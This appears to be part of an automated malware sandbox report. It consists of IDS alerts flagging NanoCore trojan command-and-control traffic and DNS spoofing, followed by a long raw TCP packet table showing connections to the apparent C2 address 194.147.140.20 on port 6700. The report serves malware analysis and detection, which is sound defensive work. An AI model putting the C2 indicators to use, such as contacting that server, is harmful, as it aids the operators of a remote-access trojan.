                            09/14/21-21:34:15.443417UDP254DNS SPOOF query response with TTL of 1 min. and no authority53495638.8.8.8192.168.2.3
                            09/14/21-21:34:15.930830TCP2025019ET TROJAN Possible NanoCore C2 60B497886700192.168.2.3194.147.140.20
                            09/14/21-21:34:22.547233UDP254DNS SPOOF query response with TTL of 1 min. and no authority53513528.8.8.8192.168.2.3
                            09/14/21-21:34:22.755695TCP2025019ET TROJAN Possible NanoCore C2 60B497896700192.168.2.3194.147.140.20
                            09/14/21-21:34:29.689895TCP2025019ET TROJAN Possible NanoCore C2 60B497906700192.168.2.3194.147.140.20
                            09/14/21-21:34:37.747653UDP254DNS SPOOF query response with TTL of 1 min. and no authority53570848.8.8.8192.168.2.3
                            09/14/21-21:34:37.976439TCP2025019ET TROJAN Possible NanoCore C2 60B497916700192.168.2.3194.147.140.20
                            09/14/21-21:34:45.177809TCP2025019ET TROJAN Possible NanoCore C2 60B497976700192.168.2.3194.147.140.20
                            09/14/21-21:34:51.864153TCP2025019ET TROJAN Possible NanoCore C2 60B498036700192.168.2.3194.147.140.20
                            09/14/21-21:34:59.036609UDP254DNS SPOOF query response with TTL of 1 min. and no authority53612928.8.8.8192.168.2.3
                            09/14/21-21:34:59.686604TCP2025019ET TROJAN Possible NanoCore C2 60B498046700192.168.2.3194.147.140.20
                            09/14/21-21:35:07.691066UDP254DNS SPOOF query response with TTL of 1 min. and no authority53636198.8.8.8192.168.2.3
                            09/14/21-21:35:08.153277TCP2025019ET TROJAN Possible NanoCore C2 60B498056700192.168.2.3194.147.140.20
                            09/14/21-21:35:14.936595TCP2025019ET TROJAN Possible NanoCore C2 60B498066700192.168.2.3194.147.140.20
                            09/14/21-21:35:21.802059UDP254DNS SPOOF query response with TTL of 1 min. and no authority53619468.8.8.8192.168.2.3
                            09/14/21-21:35:22.145705TCP2025019ET TROJAN Possible NanoCore C2 60B498076700192.168.2.3194.147.140.20
                            09/14/21-21:35:28.771633TCP2025019ET TROJAN Possible NanoCore C2 60B498086700192.168.2.3194.147.140.20
                            09/14/21-21:35:34.870077TCP2025019ET TROJAN Possible NanoCore C2 60B498096700192.168.2.3194.147.140.20
                            09/14/21-21:35:41.789173TCP2025019ET TROJAN Possible NanoCore C2 60B498106700192.168.2.3194.147.140.20
                            09/14/21-21:35:47.850292TCP2025019ET TROJAN Possible NanoCore C2 60B498116700192.168.2.3194.147.140.20
                            09/14/21-21:35:54.923974TCP2025019ET TROJAN Possible NanoCore C2 60B498126700192.168.2.3194.147.140.20
                            09/14/21-21:35:59.875006UDP254DNS SPOOF query response with TTL of 1 min. and no authority53587848.8.8.8192.168.2.3
                            09/14/21-21:36:00.063834TCP2025019ET TROJAN Possible NanoCore C2 60B498136700192.168.2.3194.147.140.20

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Sep 14, 2021 21:32:18.056608915 CEST49739443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:18.056648016 CEST44349739144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:18.056734085 CEST49739443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:18.087666035 CEST49739443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:18.087703943 CEST44349739144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:18.151778936 CEST44349739144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:18.151907921 CEST49739443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:18.154469967 CEST49739443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:18.154493093 CEST44349739144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:18.154827118 CEST44349739144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:18.175403118 CEST49739443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:18.219147921 CEST44349739144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:18.583820105 CEST44349739144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:18.583861113 CEST44349739144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:18.584049940 CEST49739443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:18.584074974 CEST44349739144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:18.584136963 CEST49739443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:18.584567070 CEST44349739144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:18.587747097 CEST44349739144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:18.587799072 CEST44349739144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:18.587909937 CEST49739443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:18.587930918 CEST44349739144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:18.587965012 CEST49739443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:18.589896917 CEST49739443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:53.954643965 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:53.954685926 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:53.954830885 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:53.955260038 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:53.955282927 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.003880024 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.008424997 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.008461952 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.513592958 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.513653994 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.513715982 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.513793945 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.513818979 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.538634062 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.538821936 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.538845062 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.538913965 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.541151047 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.541172981 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.541482925 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.545063972 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.545166016 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.566011906 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.566140890 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.574219942 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.574445963 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.590212107 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.590409994 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.600977898 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.601088047 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.610503912 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.610605955 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.620400906 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.620518923 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.631318092 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.631442070 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.641673088 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.641839981 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.661883116 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.662000895 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.672142982 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.672314882 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.689215899 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.689364910 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.697397947 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.697544098 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.712829113 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.712946892 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.721771002 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.722018957 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.731102943 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.731218100 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.751569986 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.751694918 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.762031078 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.762139082 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.782202005 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.782325029 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.790347099 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.790498972 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.801074982 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.801203966 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.817738056 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.817867994 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.824888945 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.824996948 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.843328953 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.843399048 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.843461037 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.843477011 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.843528986 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.843581915 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.848236084 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.848421097 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.857420921 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.857613087 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.865267038 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.865449905 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.871805906 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.871938944 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.874996901 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.875098944 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.879507065 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.879620075 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.882751942 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.882895947 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.889837980 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.889976025 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.893533945 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.893661022 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.899214983 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.899343014 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.903045893 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.903155088 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.905708075 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.905817986 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.909816980 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.909890890 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.910043001 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.910058022 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.910130024 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.910183907 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.910254955 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.916599035 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.916747093 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.921781063 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.921911955 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.926748991 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.926857948 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.928582907 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.928677082 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.934130907 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.934206963 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.934293032 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.934312105 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.934355021 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.934396029 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.934468031 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.934562922 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.936559916 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.936639071 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.939426899 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.939555883 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.945871115 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.945986986 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.950231075 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.950365067 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.951520920 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.951653004 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.957823992 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.957972050 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.958861113 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.958959103 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.959151983 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.959250927 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.959577084 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.959671974 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.960601091 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.960670948 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.960711956 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.960726023 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.960751057 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.960787058 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.969926119 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.970041990 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.971252918 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.971354961 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.974962950 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.975076914 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.982467890 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.982598066 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.982733965 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.982810020 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.982821941 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.982841969 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.982861996 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.982872009 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.982911110 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.982918024 CEST44349761144.76.136.153192.168.2.3
                            Sep 14, 2021 21:32:54.982961893 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:32:54.983402014 CEST49761443192.168.2.3144.76.136.153
                            Sep 14, 2021 21:33:39.280057907 CEST497796700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:33:39.472681046 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:39.474677086 CEST497796700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:33:40.260504007 CEST497796700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:33:40.464683056 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:40.464780092 CEST497796700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:33:40.708108902 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:40.708180904 CEST497796700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:33:40.895952940 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:40.946804047 CEST497796700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:33:41.069323063 CEST497796700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:33:41.314116001 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:41.317240000 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:41.317280054 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:41.317296982 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:41.318130016 CEST497796700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:33:41.318161011 CEST497796700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:33:41.504484892 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:41.504528046 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:41.504547119 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:41.504564047 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:41.504666090 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:41.504736900 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:41.504818916 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:41.504863024 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:41.505167961 CEST497796700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:33:41.505197048 CEST497796700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:33:41.692809105 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:41.692852020 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:41.692871094 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:41.692889929 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:41.692909002 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:41.692929029 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:41.692946911 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:41.692967892 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:41.692986965 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:41.693036079 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:41.693062067 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:41.693084955 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:41.693109035 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:41.693134069 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:41.693162918 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:41.693188906 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:41.693232059 CEST497796700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:33:41.693304062 CEST497796700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:33:41.886550903 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:41.886847973 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:41.886955976 CEST497796700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:33:41.887013912 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:41.887414932 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:41.887506008 CEST497796700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:33:41.887707949 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:41.888492107 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:41.888598919 CEST497796700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:33:41.895189047 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:41.898154020 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:41.901140928 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:41.902606964 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:41.904798031 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:41.904895067 CEST497796700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:33:41.904913902 CEST497796700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:33:41.904944897 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:41.905036926 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:41.905052900 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:41.905103922 CEST497796700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:33:41.905128002 CEST497796700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:33:41.905415058 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:41.905462980 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:41.905481100 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:41.905497074 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:41.905513048 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:41.905528069 CEST497796700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:33:41.905565977 CEST497796700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:33:41.905586958 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:41.905683994 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:41.906404018 CEST497796700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:33:41.906512976 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:41.906578064 CEST497796700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:33:41.906666040 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:41.906689882 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:41.916485071 CEST497796700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:33:42.102448940 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:42.104991913 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:42.105014086 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:42.105026007 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:42.105037928 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:42.105052948 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:42.105262041 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:42.105267048 CEST497796700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:33:42.105285883 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:42.105300903 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:42.105317116 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:42.105331898 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:42.105411053 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:42.105428934 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:42.105460882 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:42.105500937 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:42.105551958 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:42.105571032 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:42.105602026 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:42.105648994 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:42.105700970 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:42.105818033 CEST497796700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:33:42.105823040 CEST497796700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:33:42.105827093 CEST497796700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:33:42.105829954 CEST497796700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:33:42.105833054 CEST497796700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:33:42.105835915 CEST497796700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:33:42.105838060 CEST497796700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:33:42.105840921 CEST497796700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:33:42.107072115 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:42.107099056 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:42.109978914 CEST497796700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:33:42.111865997 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:42.112323046 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:42.113562107 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:42.113641977 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:42.113682985 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:42.113744974 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:42.113805056 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:42.113867998 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:42.113928080 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:42.113986969 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:42.114048958 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:42.114111900 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:42.114175081 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:42.114232063 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:42.114294052 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:42.114358902 CEST670049779194.147.140.20192.168.2.3
                            Sep 14, 2021 21:33:42.114418983 CEST670049779194.147.140.20192.168.2.3
